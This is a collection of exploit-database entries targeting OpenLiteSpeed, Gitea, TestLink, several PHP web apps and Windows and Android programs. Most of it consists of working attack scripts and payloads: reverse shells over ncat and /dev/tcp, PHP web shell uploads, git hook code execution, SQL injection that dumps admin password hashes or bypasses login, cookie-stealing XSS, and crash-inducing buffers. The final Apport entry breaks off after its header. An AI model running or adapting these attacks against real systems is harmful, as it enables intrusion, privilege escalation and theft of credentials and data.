
  1. # Exploit Title: Openlitespeed WebServer 1.7.8 - Command Injection (Authenticated) (2) # Date: 26/1/2021 # Exploit Author: Metin Yunus Kandemir # Discovered by: cmOs - SunCSR # Vendor Homepage: https://openlitespeed.org/ # Software Link: https://openlitespeed.org/kb/install-from-binary/ # Version: 1.7.8 import requests import sys import urllib3 from bs4 import BeautifulSoup """ Description: The "path" parameter has command injection vulnerability that leads to escalate privilege. OpenLiteSpeed (1.7.8) web server runs with user(nobody):group(nogroup) privilege. However, extUser and extGroup parameters could be used to join a group (GID) such as shadow, sudo, etc. Details: https://github.com/litespeedtech/openlitespeed/issues/217 Example: Step-1: ubuntu@ubuntu:~$ cat /etc/shadow cat: /etc/shadow: Permission denied Step-2: ubuntu@ubuntu:~$ nc -nvlp 4444 Listening on [0.0.0.0] (family 0, port 4444) Step-3: ubuntu@ubuntu:~/Desktop/exploits$ python3 openlitespeed.py 192.168.1.116:7080 admin MWE1ZmE2 shadow [+] Authentication was successful! [+] Version is detected: OpenLiteSpeed 1.7.8 [+] The target is vulnerable! [+] tk value is obtained: 0.98296300 1612966522 [+] Sending reverse shell to 127.0.0.1:4444 ... [+] Triggering command execution... Step-4: ubuntu@ubuntu:~$ nc -nvlp 4444 Listening on [0.0.0.0] (family 0, port 4444) Connection from 127.0.0.1 54534 received! cat /etc/shadow root:!:18620:0:99999:7::: daemon:*:17937:0:99999:7::: bin:*:17937:0:99999:7::: sys:*:17937:0:99999:7::: sync:*:17937:0:99999:7::: . . . 
""" def triggerCommandExec(target, s): data = {"act" : "restart"} trigger = s.post("https://"+target+"/view/serviceMgr.php", data = data, allow_redirects=False, verify=False) if trigger.status_code == 200: print("[+] Triggering command execution...") else: print("[-] Someting went wrong!") def commandExec(tk, groupId, s, target): data = { "name" : "lsphp", "address" : "uds://tmp/lshttpd/lsphp.sock", "note" : "", "maxConns" : "10", "env" : "PHP_LSAPI_CHILDREN=10", "initTimeout" : "60", "retryTimeout" : "0", "persistConn" : "1", "pcKeepAliveTimeout" : "", "respBuffer" : "0", "autoStart" : "2", "path" : "/usr/bin/ncat -nv 127.0.0.1 4444 -e /bin/bash", "backlog" : "100", "instances" : "1", "extUser" : "root", "extGroup" : groupId , "umask" : "", "runOnStartUp" : "1", "extMaxIdleTime" : "", "priority" : "0", "memSoftLimit" : "2047M", "memHardLimit" : "2047M", "procSoftLimit" : "1400", "procHardLimit" : "", "a" : "s", "m" : "serv", "p" : "ext", "t" : "A_EXT_LSAPI", "r" : "lsphp", "tk" : tk } exec = s.post("https://" + target + "/view/confMgr.php", data = data, allow_redirects=False, verify=False) if exec.status_code == 200: if exec.text == "Illegal entry point!": print("[-] tk value is incorrect!") sys.exit(1) else: print("[+] Sending reverse shell to 127.0.0.1:4444 ...") else: print("[-] Something went wrong!") sys.exit(1) triggerCommandExec(target, s) def loginReq(target, username, password, groupId): urllib3.disable_warnings(urllib3.exceptions.InsecureRequestWarning) s = requests.Session() data = {"userid" : username , "pass" : password } login = s.post("https://" + target + "/login.php" , data = data, allow_redirects=False, verify=False) if login.status_code == 302: print("[+] Authentication was successful!") elif login.status_code == 200: print("[-] Authentication was unsuccessful!") sys.exit(1) else: print("[-] Connection error!") sys.exit(1) version = s.get("https://" + target + "/index.php") versionSource = BeautifulSoup(version.text, "html.parser") v = 
versionSource.find('div', {'class':'project-context hidden-xs'}).text print("[+] Version is detected: OpenLiteSpeed %s" %(v.split()[2])) if v.split()[2] == "1.7.8": print("[+] The target is vulnerable!") #getting tk value getTk = s.get("https://" + target + "/view/confMgr.php?m=serv&p=ext") source = BeautifulSoup(getTk.text, 'html.parser') tk = source.find('input', {'name':'tk'}).get('value') print("[+] tk value is obtained: "+tk) commandExec(tk, groupId, s, target) def main(args): if len(args) != 5: print("usage: %s targetIp:port username password groupId " %(args[0])) print("Example: python3 openlitespeed.py 192.168.1.116:7080 admin MWE1ZmE2 shadow") sys.exit(1) loginReq(target=args[1], username=args[2], password=args[3], groupId=args[4]) if __name__ == "__main__": main(args=sys.argv)
  2. # Exploit Title: Online Marriage Registration System (OMRS) 1.0 - Remote code execution (3) # Date: 10/02/2021 # Exploit Author: Ricardo Ruiz (@ricardojoserf) # Vendor Homepage: https://phpgurukul.com/ # Software Link: https://phpgurukul.com/online-marriage-registration-system-using-php-and-mysql/ # Version: 1.0 # Tested on: Windows 10/Xampp Server and Wamp Server # Porting an existing exploit (https://www.exploit-db.com/exploits/49260, for macOs) to Linux/Windows. Adding the possibility of automatic registration and execution of any command without needing to upload any local file # Example with registration: python3 script.py -u http://172.16.1.102:80/ -c 'whoami' # Example without registration: python3 script.py -u http://172.16.1.102:80/ -c 'whoami' -m 680123456 -p dante123 import os import sys import random import argparse import requests def get_args(): parser = argparse.ArgumentParser() parser.add_argument('-u', '--url', required=True, action='store', help='Url of Online Marriage Registration System (OMRS) 1.0') parser.add_argument('-c', '--command', required=True, action='store', help='Command to execute') parser.add_argument('-m', '--mobile', required=False, action='store', help='Mobile phone used for registration') parser.add_argument('-p', '--password', required=False, action='store', help='Password used for registration') my_args = parser.parse_args() return my_args def login(url, mobile, password): url = "%s/user/login.php"%(url) payload = {'mobno':mobile, 'password':password, 'login':''} req = requests.post(url, data=payload) return req.cookies['PHPSESSID'] def upload(url, cookie, file=None): url = "%s/user/marriage-reg-form.php"%url files = {'husimage': ('shell.php', "<?php $command = shell_exec($_REQUEST['cmd']); echo $command; ?>", 'application/x-php', {'Expires': '0'}), 'wifeimage':('test.jpg','','image/jpeg')} payload = {'dom':'05/01/2020','nofhusband':'omrs_rce', 'hreligion':'omrs_rce', 
'hdob':'05/01/2020','hsbmarriage':'Bachelor','haddress':'omrs_rce','hzipcode':'omrs_rce','hstate':'omrs_rce','hadharno':'omrs_rce','nofwife':'omrs_rce','wreligion':'omrs_rce','wsbmarriage':'Bachelor','waddress':'omrs_rce','wzipcode':'omrs_rce','wstate':'omrs_rce','wadharno':'omrs_rce','witnessnamef':'omrs_rce','waddressfirst':'omrs_rce','witnessnames':'omrs_rce','waddresssec':'omrs_rce','witnessnamet':'omrs_rce','waddressthird':'omrs_rce','submit':''} req = requests.post(url, data=payload, cookies={'PHPSESSID':cookie}, files=files) print('[+] PHP shell uploaded') def get_remote_php_files(url): url = "%s/user/images"%(url) req = requests.get(url) php_files = [] for i in req.text.split(".php"): php_files.append(i[-42:]) return php_files def exec_command(url, webshell, command): url_r = "%s/user/images/%s?cmd=%s"%(url, webshell, command) req = requests.get(url_r) print("[+] Command output\n%s"%(req.text)) def register(mobile, password, url): url_r = "%s/user/signup.php"%(url) data = {"fname":"omrs_rce", "lname":"omrs_rce", "mobno":mobile, "address":"omrs_rce", "password":password, "submit":""} req = requests.post(url_r, data=data) print("[+] Registered with mobile phone %s and password '%s'"%(mobile,password)) if __name__ == "__main__": args = get_args() url = args.url command = args.command mobile = str(random.randint(100000000,999999999)) if args.mobile is None else args.mobile password = "dante123" if args.password is None else args.password if args.password is None or args.mobile is None: register(mobile,password,url) cookie = login(url, mobile, password) initial_php_files = get_remote_php_files(url) upload(url, cookie) final_php_files = get_remote_php_files(url) webshell = (list(set(final_php_files) - set(initial_php_files))[0]+".php") exec_command(url,webshell,command)
  3. # Exploit Title: PDFCOMPLETE Corporate Edition 4.1.45 - 'pdfcDispatcher' Unquoted Service Path # Discovery by: Ismael Nava # Discovery Date: 02-11-2020 # Vendor Homepage: https://www.pdfcomplete.com/cms/dpl/tabid/111/Default.aspx?r=du2vH8r # Software Links : https://pdf-complete.informer.com/download/ # Tested Version: 4.1.45 # Vulnerability Type: Unquoted Service Path # Tested on OS: Windows 10 64 bits # Step to discover Unquoted Service Path: C:\>wmic service get name, displayname, pathname, startmode | findstr /i "Auto" | findstr /i /v "C:\Windows\\" |findstr /i /v """ PDF Document Manager pdfcDispatcher C:\Program Files (x86)\PDF Complete\pdfsvc.exe /startedbyscm:66B66708-40E2BE4D-pdfcService Auto C:\>sc qc pdfcDispatcher [SC] QueryServiceConfig CORRECTO NOMBRE_SERVICIO: pdfcDispatcher TIPO : 10 WIN32_OWN_PROCESS TIPO_INICIO : 2 AUTO_START CONTROL_ERROR : 1 NORMAL NOMBRE_RUTA_BINARIO: C:\Program Files (x86)\PDF Complete\pdfsvc.exe /startedbyscm:66B66708-40E2BE4D-pdfcService GRUPO_ORDEN_CARGA : ETIQUETA : 0 NOMBRE_MOSTRAR : PDF Document Manager DEPENDENCIAS : NOMBRE_INICIO_SERVICIO: LocalSystem
  4. # Exploit Title: School File Management System 1.0 - 'multiple' Stored Cross-Site Scripting # Date: 2021-02-11 # Exploit Author: Pintu Solanki # Vendor Homepage: https://www.sourcecodester.com/ # Software Link: https://www.sourcecodester.com/php/14155/school-file-management-system.html # Software: : School File Management System 1.0 # Tested On: Windows 10 Pro 10.0.18363 N/A Build 18363 + XAMPP V3.2.4 # Vulnerable Page: http://localhost/School%20File%20Management%20System/student_profile.php # Vulnerable functionality: 'Update Account' # Vulnerable Input Field : {Firtstname} {Lastname} # Payload used: "><script>alert(document.cookie)</script> # POC: Whenever we will go to the page (http://localhost/School%20File%20Management%20System/student_profile.php) where the script is injected, the stored script will be executed. # You will see your Javascript code (XSS) executed.
  5. # Exploit Title: TestLink 1.9.20 - Unrestricted File Upload (Authenticated) # Date: 14th February 2021 # Exploit Author: snovvcrash # Original Research by: Ackcent AppSec Team # Original Research: https://ackcent.com/testlink-1-9-20-unrestricted-file-upload-and-sql-injection/ # Vendor Homepage: https://testlink.org/ # Software Link: https://github.com/TestLinkOpenSourceTRMS/testlink-code # Version: 1.9.20 # Tested on: Ubuntu 20.10 # CVE: CVE-2020-8639 # Requirements: pip3 install -U requests bs4 # Usage Example: ./exploit.py -u admin -p admin -P 127.0.0.1:8080 http://127.0.0.1/testlink """ Raw exploit request: POST /testlink/lib/keywords/keywordsImport.php HTTP/1.1 Host: 127.0.0.1 User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:78.0) Gecko/20100101 Firefox/78.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8 Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate Content-Type: multipart/form-data; boundary=---------------------------242818621515179709592867995067 Content-Length: 1187 Origin: http://127.0.0.1 Connection: close Referer: http://127.0.0.1/testlink//lib/keywords/keywordsImport.php?tproject_id=1 Cookie: PHPSESSID=kvbpl3t3lec42qbjdcgdppncib; TESTLINK1920TESTLINK_USER_AUTH_COOKIE=af57ebce9f54ce0f0e36d24ef25dc9c1b3a9d2f8e0b9cb4454c973927306e90f Upgrade-Insecure-Requests: 1 -----------------------------242818621515179709592867995067 Content-Disposition: form-data; name="CSRFName" CSRFGuard_1115715115 -----------------------------242818621515179709592867995067 Content-Disposition: form-data; name="CSRFToken" 506c4b44825c5e5885231c263e7195188dedbd154b9cf74e5d183c1feb953aec7c0edae1097649d82acd20f6f851e0cdbac91cc0589d1cfd6fb13741f9cf0cb8 -----------------------------242818621515179709592867995067 Content-Disposition: form-data; name="importType" /../../../logs/pwn.php -----------------------------242818621515179709592867995067 Content-Disposition: form-data; name="MAX_FILE_SIZE" 409600 
-----------------------------242818621515179709592867995067 Content-Disposition: form-data; name="uploadedFile"; filename="foo.xml" Content-Type: application/xml <?php if(isset($_REQUEST['c'])){system($_REQUEST['c'].' 2>&1' );} ?> -----------------------------242818621515179709592867995067 Content-Disposition: form-data; name="tproject_id" 1 -----------------------------242818621515179709592867995067 Content-Disposition: form-data; name="UploadFile" Upload file -----------------------------242818621515179709592867995067-- """ #!/usr/bin/env python3 import re from urllib import parse from cmd import Cmd from base64 import b64encode from argparse import ArgumentParser import requests from bs4 import BeautifulSoup parser = ArgumentParser() parser.add_argument('target', help='target full URL without trailing slash, ex. "http://127.0.0.1/testlink"') parser.add_argument('-u', '--username', default='admin', help='TestLink username') parser.add_argument('-p', '--password', default='admin', help='TestLink password') parser.add_argument('-P', '--proxy', default=None, help='HTTP proxy in format <HOST:PORT>, ex. "127.0.0.1:8080"') args = parser.parse_args() class TestLinkWebShell(Cmd): payloadPHP = """<?php if(isset($_REQUEST['c'])){system($_REQUEST['c'].' 
2>&1' );} ?>""" uploadPath = 'logs/pwn.php' prompt = '$ ' def __init__(self, target, username, password, proxies): super().__init__() self.target = target self.username = username self.password = password if proxies: self.proxies = {'http': f'http://{proxies}', 'https': f'http://{proxies}'} else: self.proxies = None self.session = requests.Session() self.session.verify = False resp = self.session.get(f'{self.target}/login.php', proxies=self.proxies) soup = BeautifulSoup(resp.text, 'html.parser') self.csrf_name = soup.find('input', {'name': 'CSRFName'}).get('value') self.csrf_token = soup.find('input', {'name': 'CSRFToken'}).get('value') self.req_uri = soup.find('input', {'name': 'reqURI'}).get('value') self.destination = soup.find('input', {'name': 'destination'}).get('value') def auth(self): data = { 'CSRFName': self.csrf_name, 'CSRFToken': self.csrf_token, 'reqURI': self.req_uri, 'destination': self.destination, 'tl_login': self.username, 'tl_password': self.password } resp = self.session.post(f'{self.target}/login.php?viewer=', data=data, proxies=self.proxies) if resp.status_code == 200: print('[*] Authentication succeeded') resp = self.session.get(f'{self.target}/lib/general/mainPage.php', proxies=self.proxies) if resp.status_code == 200: print('[*] Loaded mainPage.php iframe contents') soup = BeautifulSoup(resp.text, 'html.parser') self.tproject_id = soup.find('a', {'href': re.compile(r'lib/keywords/keywordsView.php\?')}).get('href') self.tproject_id = parse.parse_qs(parse.urlsplit(self.tproject_id).query)['tproject_id'][0] print(f'[+] Extracted tproject_id value: {self.tproject_id}') else: raise Exception('Error loading mainPage.php iframe contents') else: raise Exception('Authentication failed') def upload_web_shell(self): files = [ ('CSRFName', (None, self.csrf_name)), ('CSRFToken', (None, self.csrf_token)), ('importType', (None, f'/../../../{TestLinkWebShell.uploadPath}')), ('MAX_FILE_SIZE', (None, '409600')), ('uploadedFile', ('foo.xml', 
TestLinkWebShell.payloadPHP)), ('tproject_id', (None, self.tproject_id)), ('UploadFile', (None, 'Upload file')) ] resp = self.session.post(f'{self.target}/lib/keywords/keywordsImport.php', files=files, proxies=self.proxies) if resp.status_code == 200: print(f'[*] Web shell uploaded here: {self.target}/{TestLinkWebShell.uploadPath}') print('[*] Trying to query whoami...') resp = self.session.get(f'{self.target}/{TestLinkWebShell.uploadPath}?c=whoami', proxies=self.proxies) if resp.status_code == 200: print(f'[+] Success! Starting semi-interactive shell as {resp.text.strip()}') else: raise Exception('Error interacting with the web shell') else: raise Exception('Error uploading web shell') def emptyline(self): pass def preloop(self): self.auth() self.upload_web_shell() def default(self, args): try: resp = self.session.get(f'{self.target}/{TestLinkWebShell.uploadPath}?c={args}', proxies=self.proxies) if resp.status_code == 200: print(resp.text.strip()) except Exception as e: print(f'*** Something weired happened: {e}') def do_spawn(self, args): """Spawn a reverse shell. Usage: \"spawn <LHOST> <LPORT>\".""" try: lhost, lport = args.split() payload = f'/bin/bash -i >& /dev/tcp/{lhost}/{lport} 0>&1' b64_payload = b64encode(payload.encode()).decode() cmd = f'echo {b64_payload} | base64 -d | /bin/bash' self.default(cmd) except Exception as e: print(f'*** Something weired happened: {e}') def do_EOF(self, args): """Use Ctrl-D to exit the shell.""" print(); return True if __name__ == '__main__': tlws = TestLinkWebShell(args.target, args.username, args.password, args.proxy) tlws.cmdloop('Type help for list of commands')
  6. # Exploit Title: School Event Attendance Monitoring System 1.0 - 'Item Name' Stored Cross-Site Scripting # Date: 2021-02-11 # Exploit Author: Suresh Kumar # Vendor Homepage: https://www.sourcecodester.com/ # Software Link: https://www.sourcecodester.com/php/12613/php-attendance-monitoring-system-barcode-scanning.html # Software: School Event Attendance Monitoring System 1.0 # Tested on Windows 10 XAMPP # This application is vulnerable to Stored XSS vulnerability. # Vulnerable Page: http://localhost/attendance/sanction # Vulnerable functionality: 'Add Sanction ' # Vulnerable Input Field : Item Name # Payload used: "><script>alert(document.cookie)</script> # POC: Whenever we will go to the page (http://localhost/attendance/sanction) where the script is injected, the stored script will be executed. # You will see your Javascript code (XSS) executed.
  7. # Exploit Title: Teachers Record Management System 1.0 - 'searchteacher' SQL Injection # Date: 13/02/2021 # Exploit Author: Soham Bakore, Nakul Ratti # Vendor Homepage: https://www.sourcecodester.com/ # Software Link: https://www.sourcecodester.com/php/14399/teacher-record-system-phpmysql.html # Version:1.0 # Tested on: latest version of Chrome, Firefox on Windows and Linux --------------------------Proof of Concept----------------------- 1. Navigate to http://host/trms/ 2. The "searchteacher" parameter in search-teacher.php is vulnerable to SQL injection 3. Below curl request will display the admin username and password hash ------------------------Exploit request----------------------------- curl -i -s -k -X $'POST' \ -H $'Host: 192.168.1.13' -H $'User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:84.0) Gecko/20100101 Firefox/84.0' -H $'Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8' -H $'Accept-Language: en-US,en;q=0.5' -H $'Accept-Encoding: gzip, deflate' -H $'Content-Type: application/x-www-form-urlencoded' -H $'Content-Length: 130' -H $'Origin: http://192.168.1.17' -H $'DNT: 1' -H $'Connection: close' -H $'Referer: http://192.168.1.13/trms/' -H $'Cookie: PHPSESSID=t2lshgnjhov62o1s0q0iq331p9' -H $'Upgrade-Insecure-Requests: 1' \ -b $'PHPSESSID=t2lshgnjhov62o1s0q0iq331p9' \ --data-binary $'searchteacher=Arts\'+union+select+1,concat(\'Username:\',UserName),3,concat(\'Password:\',Password),5,6,7,8,9,10+from+tbladmin#&search=' \ $'http://host/trms/search-teacher.php'
  8. # Exploit Title: Tasks 9.7.3 - Insecure Permissions # Date: 18th of July, 2020 # Exploit Author: Lyhin's Lab # Detailed Bug Description: https://lyhinslab.org/index.php/2020/07/18/how-the-white-box-hacking-works-ok-google-i-wanna-pwn-this-app/ # Vendor Homepage: https://tasks.org/ # Software Link: https://github.com/tasks/tasks # Version: 9.7.3 # Tested on: Android 9 Any installed application on a victim's phone can add arbitrary tasks to users through insecure IPC handling. A malicious application has several ways of how to achieve that: 1. By sending multiple intents to ShareLink activity (com/todoroo/astrid/activity/ShareLinkActivity.java). Tasks application adds the first requested "task" to the user's task list. 2. By sending an intent to VoiceCommand activity (org/tasks/voice/VoiceCommandActivity.java). The application does not validate intent's origin, so any application can append tasks to the user's task list. We used the Drozer application to emulate malicious app activity. Please find the commands below. run app.activity.start --component org.tasks.debug com.todoroo.astrid.activity.ShareLinkActivity --action=android.intent.action.PROCESS_TEXT --extra string android.intent.extra.PROCESS_TEXT "Kill Mufasa" run app.activity.start --component org.tasks.debug org.tasks.voice.VoiceCommandActivity --action=com.google.android.gm.action.AUTO_SEND --extra string android.intent.extra.TEXT "Visit https://lyhinslab.org"
  9. # Exploit Title: Online Internship Management System 1.0 - 'email' SQL injection Auth Bypass # Date: 16-02-2021 # Exploit Author: Christian Vierschilling # Vendor Homepage: https://www.sourcecodester.com # Software Link: https://www.sourcecodester.com/php/14712/online-internship-management-system-phpmysqli-full-source-code.html # Version: 1.0 # Tested on: PHP 7.4.14, Linux x64_x86 # --- Description --- # The application contains sql injections in the parameters 'email' and 'password' in the file 'login.php'. # --- Proof of concept --- # Curl request for authentication bypass via sql injection in parameter 'email': curl http://x.x.x.x/internship/login.php --data "email='%20or%201=1;#&password=none&login="
  10. # Exploit Title: BlackCat CMS 1.3.6 - 'Display name' Cross Site Scripting (XSS) # Date: 16-02-2021 # Exploit Author: Kamaljeet Kumar - TATA Advanced Systems Limited # Vendor Homepage: https://blackcat-cms.org/ # Software Link: https://blackcat-cms.org/page/download.php # Version: BlackCat CMS - 1.3.6 # Tested on: Windows # Steps to Reproduce: 1. Exploiting this vulnerability requires a login to the admin panel. Log in, click the admin profile button, enter the payload " onmouseover=alert(1) " in the Display name field and click the Save button. 2. Then refresh the page and hover the mouse over the Display name field; the XSS message pops up.
  11. # Exploit Title: Managed Switch Port Mapping Tool 2.85.2 - Denial of Service (PoC) # Date: 2021-02-15 # Exploit Author: Ismael Nava # Vendor Homepage: https://switchportmapper.com/ # Software Link: https://switchportmapper.com/download.htm # Version: 2.85.2 # Tested on: Windows 10 Home x64 #STEPS # Open the program Managed Switch Port Mapping Tool # In the left side select Settings from Router/Srvr 1 (for layer 2 Switches) # Run the python exploit script, it will create a new .txt files # Copy the content of the file "Gou.txt" # Paste the content in the field IP Address and SNMP v1/v2c Read Community Name # Click in OK # End :) buffer = 'F' * 10000 try: file = open("Gou2.txt","w") file.write(buffer) file.close() print("Archive ready") except: print("Archive no ready")
  12. # Exploit Title: AgataSoft PingMaster Pro 2.1 - Denial of Service (PoC) # Date: 2021-02-15 # Exploit Author: Ismael Nava # Vendor Homepage: http://agatasoft.com/ # Software Link: http://agatasoft.com/Ping_Master_Pro.exe # Version: 2.1 # Tested on: Windows 10 Home x64 #STEPS # Open the program AgataSoft PingMaster Pro # In Tools select the option Trace Route # Run the python exploit script, it will create a new .txt files # Copy the content of the file "Gou.txt" # Paste the content in the field Host name and click in Get IP from host name # End :) buffer = 'S' * 10000 try: file = open("Gou.txt","w") file.write(buffer) file.close() print("Archive ready") except: print("Archive no ready")
  13. # Exploit Title: Nsauditor 3.2.2.0 - 'Event Description' Denial of Service (PoC) # Date: 2021-02-15 # Exploit Author: Ismael Nava # Vendor Homepage: https://www.nsauditor.com/ # Software Link: http://www.nsauditor.com/downloads/nsauditor_setup.exe # Version: 3.2.2.0 # Tested on: Windows 10 Home x64 #STEPS # Open the program Nsauditor # In Options select Configuration... # Click in Security Events # Run the python exploit script, it will create a new .txt files # Copy the content of the file "Liella.txt" # Paste the content in the field Event Description and click in Add Event # End :) buffer = 'U' * 10000 try: file = open("Liella.txt","w") file.write(buffer) file.close() print("Archive ready") except: print("Archive no ready")
  14. # Exploit Title: Faulty Evaluation System 1.0 - 'multiple' Stored Cross-Site Scripting # Date: 2021-02-16 # Exploit Author: Suresh Kumar # Vendor Homepage: https://www.sourcecodester.com/ # Software Link: https://www.sourcecodester.com/php/14710/faulty-evaluation-system-using-phpcodeigniter-source-code.html # Software: Faulty Evaluation System 1.0 # Tested On: Windows 10 Pro 10.0.18363 N/A Build 18363 + XAMPP V3.2.4 # Vulnerable Page: http://localhost/evaluation/student/list # Vulnerable functionality: 'Student' # Vulnerable Input Field : {Firtstname} {Lastname} {Middle Name} # Payload used: <a onmouseover="alert(document.cookie)">xxs link</a> # POC: Whenever we will go to the page ( http://localhost/evaluation/student/list) where the script is injected, the stored script will be executed. # You will see your Javascript code (XSS) executed.
  15. # Exploit Title: Billing Management System 2.0 - 'email' SQL injection Auth Bypass # Date: 2021-02-16 # Exploit Author: Pintu Solanki # Vendor Homepage: https://www.sourcecodester.com/ # Software Link: https://www.sourcecodester.com/php/14380/billing-management-system-php-mysql-updated.html # Software: Billing Management System 2.0 # Vulnerability Type: SQL injection - Auth Bypass # Tested On: Windows 10 Pro 10.0.18363 N/A Build 18363 + XAMPP V3.2.4 # This application is vulnerable to SQL injection vulnerability. # Vulnerable Page: http://localhost/smartbilling/smartbilling_source_code/index.php # Payload used: Username => admin' or '1'='1 Password => admin' or '1'='1 # POC: Whenever we will go to the page (http://localhost/smartbilling/smartbilling_source_code/index.php) when we inject SQL Payload then we will directly enter into the admin page.
  16. # Exploit Title: Gitea 1.12.5 - Remote Code Execution (Authenticated) # Date: 17 Feb 2020 # Exploit Author: Podalirius # PoC demonstration article: https://podalirius.net/en/articles/exploiting-cve-2020-14144-gitea-authenticated-remote-code-execution/ # Vendor Homepage: https://gitea.io/ # Software Link: https://dl.gitea.io/ # Version: >= 1.1.0 to <= 1.12.5 # Tested on: Ubuntu 16.04 with GiTea 1.6.1 #!/usr/bin/env python3 # -*- coding: utf-8 -*- import argparse import os import pexpect import random import re import sys import time import requests requests.packages.urllib3.disable_warnings() requests.packages.urllib3.util.ssl_.DEFAULT_CIPHERS += ':HIGH:!DH:!aNULL' try: requests.packages.urllib3.contrib.pyopenssl.util.ssl_.DEFAULT_CIPHERS += ':HIGH:!DH:!aNULL' except AttributeError: pass class GiTea(object): def __init__(self, host, verbose=False): super(GiTea, self).__init__() self.verbose = verbose self.host = host self.username = None self.password = None self.uid = None self.session = None def _get_csrf(self, url): pattern = 'name="_csrf" content="([a-zA-Z0-9\-\_=]+)"' csrf = [] while len(csrf) == 0: r = self.session.get(url) csrf = re.findall(pattern, r.text) time.sleep(1) csrf = csrf[0] return csrf def _get_uid(self, url): pattern = 'name="_uid" content="([0-9]+)"' uid = re.findall(pattern, self.session.get(url).text) while len(uid) == 0: time.sleep(1) uid = re.findall(pattern, self.session.get(url).text) uid = uid[0] return int(uid) def login(self, username, password): if self.verbose == True: print(" [>] login('%s', ...)" % username) self.session = requests.Session() r = self.session.get('%s/user/login' % self.host) self.username = username self.password = password # Logging in csrf = self._get_csrf(self.host) r = self.session.post( '%s/user/login?redirect_to=%%2f%s' % (self.host, self.username), data = {'_csrf':csrf, 'user_name':username, 'password':password}, allow_redirects=True ) if b'Username or password is incorrect.' 
in r.content: return False else: # Getting User id self.uid = self._get_uid(self.host) return True def repo_create(self, repository_name): if self.verbose == True: print(" [>] Creating repository : %s" % repository_name) csrf = self._get_csrf(self.host) # Create repo r = self.session.post( '%s/repo/create' % self.host, data = { '_csrf' : csrf, 'uid' : self.uid, 'repo_name' : repository_name, 'description' : "Lorem Ipsum", 'gitignores' : '', 'license' : '', 'readme' : 'Default', 'auto_init' : 'off' } ) return None def repo_delete(self, repository_name): if self.verbose == True: print(" [>] Deleting repository : %s" % repository_name) csrf = self._get_csrf('%s/%s/%s/settings' % (self.host, self.username, repository_name)) # Delete repository r = self.session.post( '%s/%s/%s/settings' % (self.host, self.username, repository_name), data = { '_csrf' : csrf, 'action' : "delete", 'repo_name' : repository_name } ) return def repo_set_githook_pre_receive(self, repository_name, content): if self.verbose == True: print(" [>] repo_set_githook_pre_receive('%s')" % repository_name) csrf = self._get_csrf('%s/%s/%s/settings/hooks/git/pre-receive' % (self.host, self.username, repository_name)) # Set pre receive git hook r = self.session.post( '%s/%s/%s/settings/hooks/git/pre-receive' % (self.host, self.username, repository_name), data = { '_csrf' : csrf, 'content' : content } ) return def repo_set_githook_update(self, repository_name, content): if self.verbose == True: print(" [>] repo_set_githook_update('%s')" % repository_name) csrf = self._get_csrf('%s/%s/%s/settings/hooks/git/update' % (self.host, self.username, repository_name)) # Set update git hook r = self.session.post( '%s/%s/%s/settings/hooks/git/update' % (self.host, self.username, repository_name), data = { '_csrf' : csrf, 'content' : content } ) return def repo_set_githook_post_receive(self, repository_name, content): if self.verbose == True: print(" [>] repo_set_githook_post_receive('%s')" % repository_name) csrf = 
self._get_csrf('%s/%s/%s/settings/hooks/git/post-receive' % (self.host, self.username, repository_name)) # Set post receive git hook r = self.session.post( '%s/%s/%s/settings/hooks/git/post-receive' % (self.host, self.username, repository_name), data = { '_csrf' : csrf, 'content' : content } ) return def logout(self): if self.verbose == True: print(" [>] logout()") # Logging out r = self.session.get('%s/user/logout' % self.host) return None def trigger_exploit(host, username, password, repository_name, verbose=False): # Create a temporary directory tmpdir = os.popen('mktemp -d').read().strip() os.chdir(tmpdir) # We create some files in the repository os.system('touch README.md') rndstring = ''.join([hex(random.randint(0,15))[2:] for k in range(32)]) os.system('echo "%s" >> README.md' % rndstring) os.system('git init') os.system('git add README.md') os.system('git commit -m "Initial commit"') # Connect to remote source repository os.system('git remote add origin %s/%s/%s.git' % (host, username, repository_name)) # Push the files (it will trigger post-receive git hook) conn = pexpect.spawn("/bin/bash -c 'cd %s && git push -u origin master'" % tmpdir) conn.expect("Username for .*: ") conn.sendline(username) conn.expect("Password for .*: ") conn.sendline(password) conn.expect("Total.*") print(conn.before.decode('utf-8').strip()) return None def header(): print(""" _____ _ _______ / ____(_)__ __| CVE-2020-14144 | | __ _ | | ___ __ _ | | |_ | | | |/ _ \/ _` | Authenticated Remote Code Execution | |__| | | | | __/ (_| | \_____|_| |_|\___|\__,_| GiTea versions >= 1.1.0 to <= 1.12.5 """) if __name__ == '__main__': header() parser = argparse.ArgumentParser(description='Process some integers.') parser.add_argument('-v','--verbose', required=False, default=False, action='store_true', help='Increase verbosity.') parser.add_argument('-t','--target', required=True, type=str, help='Target host (http://..., https://... 
or domain name)') parser.add_argument('-u','--username', required=True, type=str, default=None, help='GiTea username') parser.add_argument('-p','--password', required=True, type=str, default=None, help='GiTea password') parser.add_argument('-I','--rev-ip', required=False, type=str, default=None, help='Reverse shell listener IP') parser.add_argument('-P','--rev-port', required=False, type=int, default=None, help='Reverse shell listener port') parser.add_argument('-f','--payload-file', required=False, default=None, help='Path to shell script payload to use.') args = parser.parse_args() if (args.rev_ip == None or args.rev_port == None): if args.payload_file == None: print('[!] Either (-I REV_IP and -P REV_PORT) or (-f PAYLOAD_FILE) options are needed') sys.exit(-1) # Read specific payload file if args.payload_file != None: f = open(args.payload_file, 'r') hook_payload = ''.join(f.readlines()) f.close() else: hook_payload = """#!/bin/bash\nbash -i >& /dev/tcp/%s/%d 0>&1 &\n""" % (args.rev_ip, args.rev_port) if args.target.startswith('http://'): pass elif args.target.startswith('https://'): pass else: args.target = 'https://' + args.target print('[+] Starting exploit ...') g = GiTea(args.target, verbose=args.verbose) if g.login(args.username, args.password): reponame = 'vuln' g.repo_delete(reponame) g.repo_create(reponame) g.repo_set_githook_post_receive(reponame, hook_payload) g.logout() trigger_exploit(g.host, g.username, g.password, reponame, verbose=args.verbose) g.repo_delete(reponame) else: print('\x1b[1;91m[!]\x1b[0m Could not login with these credentials.') print('[+] Exploit completed !')
# Exploit Title: Apport 2.20 - Local Privilege Escalation
# Date: 18/02/21
# Exploit Author: Gr33nh4t
# Vendor Homepage: https://ubuntu.com/
# Version: Apport: Ubuntu 20.10 - Before 2.20.11-0ubuntu50.5
Apport: Ubuntu 20.04 - Before 2.20.11-0ubuntu27.16
